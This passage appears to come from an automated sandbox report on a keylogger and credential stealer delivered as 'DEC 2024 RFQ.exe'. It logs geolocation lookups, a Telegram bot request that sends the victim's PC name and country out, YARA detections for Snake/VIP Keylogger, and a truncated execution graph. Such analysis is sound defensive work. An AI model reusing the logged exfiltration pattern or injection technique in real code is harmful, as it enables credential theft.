                                                                                                                    2024-12-11 07:59:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449746104.21.67.1524437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 07:59:22 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2024-12-11 07:59:23 UTC876INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:23 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    CF-Cache-Status: HIT
                                                                                                                    Age: 83286
                                                                                                                    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zUuCrtMvKB9MiR8yLhtycWZnQuH%2FX2qV7lxm8EZSgUQKjxAVpg4meozc5HJ0%2FEiV70SqQy030VsONiKCX2aIJzmycY7XXEbQgFlSmbXe0h1ZqAMtBPSahH%2F5ScJp9iU44jnIzL7%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f03ef593a5243a1-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1735&rtt_var=867&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4240&recv_bytes=699&delivery_rate=209049&cwnd=233&unsent_bytes=0&cid=dc239eb213867964&ts=461&x=0"
                                                                                                                    2024-12-11 07:59:23 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.449750104.21.67.1524437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 07:59:25 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    2024-12-11 07:59:26 UTC875INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:26 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    CF-Cache-Status: HIT
                                                                                                                    Age: 83289
                                                                                                                    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6LNni%2BFjqW3fZhoPhN495e%2BwL9syvmTDrgtJ2h751xmZmdBNfAPywpi4lYDzjYDseULNf6Vo6cku7KFYfZWgohkyuy0ci1x3KZqy1%2F4c12mWCNEqD0CJsNVVdy7PRzGxGc10mIX"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f03ef6cb9080f8d-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1498&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1935056&cwnd=177&unsent_bytes=0&cid=221c5f4c424d147b&ts=450&x=0"
                                                                                                                    2024-12-11 07:59:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.449752104.21.67.1524437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 07:59:29 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 07:59:29 UTC873INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:29 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 362
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                    CF-Cache-Status: HIT
                                                                                                                    Age: 83292
                                                                                                                    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tb%2F6rAhJEtY4aVoSTYO627HRIMa5t95cCDRSqAbBUINyQ13UZve7VlTgFZTZzPWbNP64lhwvUL0exw0edhJ9SE%2FRZcPXU3DfFcgNBB41R5upTxXKr5pjxJfKbnshbnPVzRSF3Ot"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f03ef8039f943e2-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1810&rtt_var=702&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1534419&cwnd=212&unsent_bytes=0&cid=0e3ae1f05cdc0093&ts=449&x=0"
                                                                                                                    2024-12-11 07:59:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.449753149.154.167.2204437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 07:59:31 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2012/12/2024%20/%2005:31:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                    Host: api.telegram.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 07:59:31 UTC344INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Wed, 11 Dec 2024 07:59:31 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 55
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2024-12-11 07:59:31 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:02:58:57
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\DEC 2024 RFQ.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\DEC 2024 RFQ.exe"
                                                                                                                    Imagebase:0x20000
                                                                                                                    File size:1'010'688 bytes
                                                                                                                    MD5 hash:34B4D7918DC670F64013E5D1F58A85CD
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:1
                                                                                                                    Start time:02:58:58
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\DEC 2024 RFQ.exe"
                                                                                                                    Imagebase:0x840000
                                                                                                                    File size:45'984 bytes
                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.9%
                                                                                                                      Dynamic/Decrypted Code Coverage:1.5%
                                                                                                                      Signature Coverage:5.9%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:167
                                                                                                                      execution_graph 100447 23633 100448 2366a 100447->100448 100449 236e7 100448->100449 100450 23688 100448->100450 100451 236e5 100448->100451 100455 5d0cc 100449->100455 100456 236ed 100449->100456 100452 23695 100450->100452 100453 2374b PostQuitMessage 100450->100453 100454 236ca DefWindowProcW 100451->100454 100458 5d154 100452->100458 100459 236a0 100452->100459 100460 236d8 100453->100460 100454->100460 100496 31070 10 API calls Mailbox 100455->100496 100461 236f2 100456->100461 100462 23715 SetTimer RegisterWindowMessageW 100456->100462 100512 82527 71 API calls _memset 100458->100512 100464 23755 100459->100464 100465 236a8 100459->100465 100468 5d06f 100461->100468 100469 236f9 KillTimer 100461->100469 100462->100460 100466 2373e CreatePopupMenu 100462->100466 100463 5d0f3 100497 31093 341 API calls Mailbox 100463->100497 100494 244a0 64 API calls _memset 100464->100494 100471 236b3 100465->100471 100472 5d139 100465->100472 100466->100460 100475 5d074 100468->100475 100476 5d0a8 MoveWindow 100468->100476 100492 2443a Shell_NotifyIconW _memset 100469->100492 100478 236be 100471->100478 100479 5d124 100471->100479 100472->100454 100511 77c36 59 API calls Mailbox 100472->100511 100473 5d166 100473->100454 100473->100460 100481 5d097 SetFocus 100475->100481 100482 5d078 100475->100482 100476->100460 100478->100454 100498 2443a Shell_NotifyIconW _memset 100478->100498 100510 82d36 81 API calls _memset 100479->100510 100480 23764 100480->100460 100481->100460 100482->100478 100486 5d081 100482->100486 100483 2370c 100493 23114 DeleteObject DestroyWindow Mailbox 100483->100493 100495 31070 10 API calls Mailbox 100486->100495 100490 5d118 100499 2434a 100490->100499 100492->100483 100493->100460 100494->100480 100495->100460 100496->100463 100497->100478 100498->100490 100500 24375 _memset 100499->100500 100513 24182 100500->100513 100503 243fa 100505 24430 Shell_NotifyIconW 100503->100505 100506 24414 Shell_NotifyIconW 100503->100506 100507 24422 100505->100507 100506->100507 100517 2407c 100507->100517 100509 24429 100509->100451 100510->100480 100511->100451 100512->100473 100514 24196 100513->100514 100515 5d423 100513->100515 100514->100503 100539 82f94 62 API calls _W_store_winword 100514->100539 100515->100514 100516 5d42c DestroyIcon 100515->100516 100516->100514 100518 24098 100517->100518 100538 2416f Mailbox 100517->100538 100540 27a16 100518->100540 100521 240b3 100545 27bcc 100521->100545 100522 5d3c8 LoadStringW 100525 5d3e2 100522->100525 100524 240c8 100524->100525 100526 240d9 100524->100526 100527 27b2e 59 API calls 100525->100527 100528 240e3 100526->100528 100529 24174 100526->100529 100532 5d3ec 100527->100532 100554 27b2e 100528->100554 100563 28047 100529->100563 100535 240ed _memset _wcscpy 100532->100535 100567 27cab 100532->100567 100534 5d40e 100537 27cab 59 API calls 100534->100537 100536 24155 Shell_NotifyIconW 100535->100536 100536->100538 100537->100535 100538->100509 100539->100503 100574 40db6 100540->100574 100542 27a3b 100584 28029 100542->100584 100546 27c45 100545->100546 100547 27bd8 __NMSG_WRITE 100545->100547 100616 27d2c 100546->100616 100549 27c13 100547->100549 100550 27bee 100547->100550 100551 28029 59 API calls 100549->100551 100615 27f27 59 API calls Mailbox 100550->100615 100553 27bf6 _memmove 100551->100553 100553->100524 100555 27b40 100554->100555 100556 5ec6b 100554->100556 100624 27a51 100555->100624 100630 77bdb 59 API calls _memmove 100556->100630 100559 27b4c 100559->100535 100560 5ec75 100561 28047 59 API calls 100560->100561 100562 5ec7d Mailbox 100561->100562 100564 28052 100563->100564 100565 2805a 100563->100565 100631 27f77 59 API calls 2 library calls 100564->100631 100565->100535 100568 27cbf 100567->100568 100569 5ed4a 100567->100569 100632 27c50 100568->100632 100571 28029 59 API calls 100569->100571 100573 5ed55 __NMSG_WRITE _memmove 100571->100573 100572 27cca 100572->100534 100576 40dbe 100574->100576 100577 40dd8 100576->100577 100579 40ddc std::exception::exception 100576->100579 100587 4571c 100576->100587 100604 433a1 DecodePointer 100576->100604 100577->100542 100605 4859b RaiseException 100579->100605 100581 40e06 100606 484d1 58 API calls _free 100581->100606 100583 40e18 100583->100542 100585 40db6 Mailbox 59 API calls 100584->100585 100586 240a6 100585->100586 100586->100521 100586->100522 100588 45797 100587->100588 100591 45728 100587->100591 100613 433a1 DecodePointer 100588->100613 100590 4579d 100614 48b28 58 API calls __getptd_noexit 100590->100614 100594 4575b RtlAllocateHeap 100591->100594 100597 45733 100591->100597 100598 45783 100591->100598 100602 45781 100591->100602 100610 433a1 DecodePointer 100591->100610 100594->100591 100595 4578f 100594->100595 100595->100576 100597->100591 100607 4a16b 58 API calls __NMSG_WRITE 100597->100607 100608 4a1c8 58 API calls 5 library calls 100597->100608 100609 4309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100597->100609 100611 48b28 58 API calls __getptd_noexit 100598->100611 100612 48b28 58 API calls __getptd_noexit 100602->100612 100604->100576 100605->100581 100606->100583 100607->100597 100608->100597 100610->100591 100611->100602 100612->100595 100613->100590 100614->100595 100615->100553 100617 27d3a 100616->100617 100619 27d43 _memmove 100616->100619 100617->100619 100620 27e4f 100617->100620 100619->100553 100621 27e62 100620->100621 100623 27e5f _memmove 100620->100623 100622 40db6 Mailbox 59 API calls 100621->100622 100622->100623 100623->100619 100625 27a5f 100624->100625 100629 27a85 _memmove 100624->100629 100626 40db6 Mailbox 59 API calls 100625->100626 100625->100629 100627 27ad4 100626->100627 100628 40db6 Mailbox 59 API calls 100627->100628 100628->100629 100629->100559 100630->100560 100631->100565 100633 27c5f __NMSG_WRITE 100632->100633 100634 28029 59 API calls 100633->100634 100635 27c70 _memmove 100633->100635 100636 5ed07 _memmove 100634->100636 100635->100572 100637 47c56 100638 47c62 __mtinitlocknum 100637->100638 100674 49e08 GetStartupInfoW 100638->100674 100640 47c67 100676 48b7c GetProcessHeap 100640->100676 100642 47cbf 100643 47cca 100642->100643 100759 47da6 58 API calls 3 library calls 100642->100759 100677 49ae6 100643->100677 100646 47cd0 100647 47cdb __RTC_Initialize 100646->100647 100760 47da6 58 API calls 3 library calls 100646->100760 100698 4d5d2 100647->100698 100650 47cea 100651 47cf6 GetCommandLineW 100650->100651 100761 47da6 58 API calls 3 library calls 100650->100761 100717 54f23 GetEnvironmentStringsW 100651->100717 100654 47cf5 100654->100651 100657 47d10 100658 47d1b 100657->100658 100762 430b5 58 API calls 3 library calls 100657->100762 100727 54d58 100658->100727 100661 47d21 100662 47d2c 100661->100662 100763 430b5 58 API calls 3 library calls 100661->100763 100741 430ef 100662->100741 100665 47d34 100666 47d3f __wwincmdln 100665->100666 100764 430b5 58 API calls 3 library calls 100665->100764 100747 247d0 100666->100747 100669 47d53 100670 47d62 100669->100670 100765 43358 58 API calls _doexit 100669->100765 100766 430e0 58 API calls _doexit 100670->100766 100673 47d67 __mtinitlocknum 100675 49e1e 100674->100675 100675->100640 100676->100642 100767 43187 36 API calls 2 library calls 100677->100767 100679 49aeb 100768 49d3c InitializeCriticalSectionAndSpinCount __mtinitlocknum 100679->100768 100681 49af0 100682 49af4 100681->100682 100770 49d8a TlsAlloc 100681->100770 100769 49b5c 61 API calls 2 library calls 100682->100769 100685 49b06 100685->100682 100687 49b11 100685->100687 100686 49af9 100686->100646 100771 487d5 100687->100771 100690 49b53 100779 49b5c 61 API calls 2 library calls 100690->100779 100693 49b32 100693->100690 100695 49b38 100693->100695 100694 49b58 100694->100646 100778 49a33 58 API calls 4 library calls 100695->100778 100697 49b40 GetCurrentThreadId 100697->100646 100699 4d5de __mtinitlocknum 100698->100699 100791 49c0b 100699->100791 100701 4d5e5 100702 487d5 __calloc_crt 58 API calls 100701->100702 100703 4d5f6 100702->100703 100704 4d661 GetStartupInfoW 100703->100704 100705 4d601 __mtinitlocknum @_EH4_CallFilterFunc@8 100703->100705 100706 4d7a5 100704->100706 100713 4d676 100704->100713 100705->100650 100707 4d86d 100706->100707 100710 4d7f2 GetStdHandle 100706->100710 100712 4d805 GetFileType 100706->100712 100799 49e2b InitializeCriticalSectionAndSpinCount 100706->100799 100800 4d87d LeaveCriticalSection _doexit 100707->100800 100709 487d5 __calloc_crt 58 API calls 100709->100713 100710->100706 100711 4d6c4 100711->100706 100714 4d6f8 GetFileType 100711->100714 100798 49e2b InitializeCriticalSectionAndSpinCount 100711->100798 100712->100706 100713->100706 100713->100709 100713->100711 100714->100711 100718 54f34 100717->100718 100719 47d06 100717->100719 100840 4881d 58 API calls 2 library calls 100718->100840 100723 54b1b GetModuleFileNameW 100719->100723 100721 54f5a _memmove 100722 54f70 FreeEnvironmentStringsW 100721->100722 100722->100719 100724 54b4f _wparse_cmdline 100723->100724 100726 54b8f _wparse_cmdline 100724->100726 100841 4881d 58 API calls 2 library calls 100724->100841 100726->100657 100728 54d71 __NMSG_WRITE 100727->100728 100732 54d69 100727->100732 100729 487d5 __calloc_crt 58 API calls 100728->100729 100737 54d9a __NMSG_WRITE 100729->100737 100730 54df1 100731 42d55 _free 58 API calls 100730->100731 100731->100732 100732->100661 100733 487d5 __calloc_crt 58 API calls 100733->100737 100734 54e16 100735 42d55 _free 58 API calls 100734->100735 100735->100732 100737->100730 100737->100732 100737->100733 100737->100734 100738 54e2d 100737->100738 100842 54607 58 API calls 2 library calls 100737->100842 100843 48dc6 IsProcessorFeaturePresent 100738->100843 100740 54e39 100740->100661 100742 430fb __IsNonwritableInCurrentImage 100741->100742 100866 4a4d1 100742->100866 100744 43119 __initterm_e 100746 43138 _doexit __IsNonwritableInCurrentImage 100744->100746 100869 42d40 100744->100869 100746->100665 100748 247ea 100747->100748 100758 24889 100747->100758 100749 24824 IsThemeActive 100748->100749 100904 4336c 100749->100904 100753 24850 100916 248fd SystemParametersInfoW SystemParametersInfoW 100753->100916 100755 2485c 100917 23b3a 100755->100917 100757 24864 SystemParametersInfoW 100757->100758 100758->100669 100759->100643 100760->100647 100761->100654 100765->100670 100766->100673 100767->100679 100768->100681 100769->100686 100770->100685 100774 487dc 100771->100774 100773 48817 100773->100690 100777 49de6 TlsSetValue 100773->100777 100774->100773 100776 487fa 100774->100776 100780 551f6 100774->100780 100776->100773 100776->100774 100788 4a132 Sleep 100776->100788 100777->100693 100778->100697 100779->100694 100781 55201 100780->100781 100786 5521c 100780->100786 100782 5520d 100781->100782 100781->100786 100789 48b28 58 API calls __getptd_noexit 100782->100789 100784 5522c HeapAlloc 100785 55212 100784->100785 100784->100786 100785->100774 100786->100784 100786->100785 100790 433a1 DecodePointer 100786->100790 100788->100776 100789->100785 100790->100786 100792 49c1c 100791->100792 100793 49c2f EnterCriticalSection 100791->100793 100801 49c93 100792->100801 100793->100701 100795 49c22 100795->100793 100825 430b5 58 API calls 3 library calls 100795->100825 100798->100711 100799->100706 100800->100705 100802 49c9f __mtinitlocknum 100801->100802 100803 49cc0 100802->100803 100804 49ca8 100802->100804 100818 49ce1 __mtinitlocknum 100803->100818 100829 4881d 58 API calls 2 library calls 100803->100829 100826 4a16b 58 API calls __NMSG_WRITE 100804->100826 100806 49cad 100827 4a1c8 58 API calls 5 library calls 100806->100827 100809 49cd5 100811 49cdc 100809->100811 100812 49ceb 100809->100812 100810 49cb4 100828 4309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100810->100828 100830 48b28 58 API calls __getptd_noexit 100811->100830 100815 49c0b __lock 58 API calls 100812->100815 100816 49cf2 100815->100816 100819 49d17 100816->100819 100820 49cff 100816->100820 100818->100795 100832 42d55 100819->100832 100831 49e2b InitializeCriticalSectionAndSpinCount 100820->100831 100823 49d0b 100838 49d33 LeaveCriticalSection _doexit 100823->100838 100826->100806 100827->100810 100829->100809 100830->100818 100831->100823 100833 42d5e RtlFreeHeap 100832->100833 100834 42d87 __dosmaperr 100832->100834 100833->100834 100835 42d73 100833->100835 100834->100823 100839 48b28 58 API calls __getptd_noexit 100835->100839 100837 42d79 GetLastError 100837->100834 100838->100818 100839->100837 100840->100721 100841->100726 100842->100737 100844 